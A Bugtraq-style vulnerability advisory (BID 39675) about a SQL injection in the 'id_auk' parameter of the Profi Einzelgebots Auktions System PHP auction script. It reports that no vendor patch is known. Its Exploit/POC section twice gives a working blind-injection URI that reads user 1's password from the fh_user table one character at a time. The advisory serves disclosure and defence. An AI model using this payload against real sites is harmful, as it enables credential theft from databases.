Profi Einzelgebots Auktions System 'id_auk' Parameter SQL Injection Vulnerability
BID:39675
Info
Profi Einzelgebots Auktions System 'id_auk' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 39675 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2010 12:00AM |
| Updated: | Apr 01 2010 12:00AM |
| Credit: | Easy Laster |
| Vulnerable: |
phpscripte24 Profi Einzelgebots Auktions System 0 |
| Not Vulnerable: | |
Exploit / POC
Profi Einzelgebots Auktions System 'id_auk' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/auktion/auktion_text.php?id_auk=1+and+1=1+and+ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/auktion/auktion_text.php?id_auk=1+and+1=1+and+ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
Solution / Fix
Profi Einzelgebots Auktions System 'id_auk' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].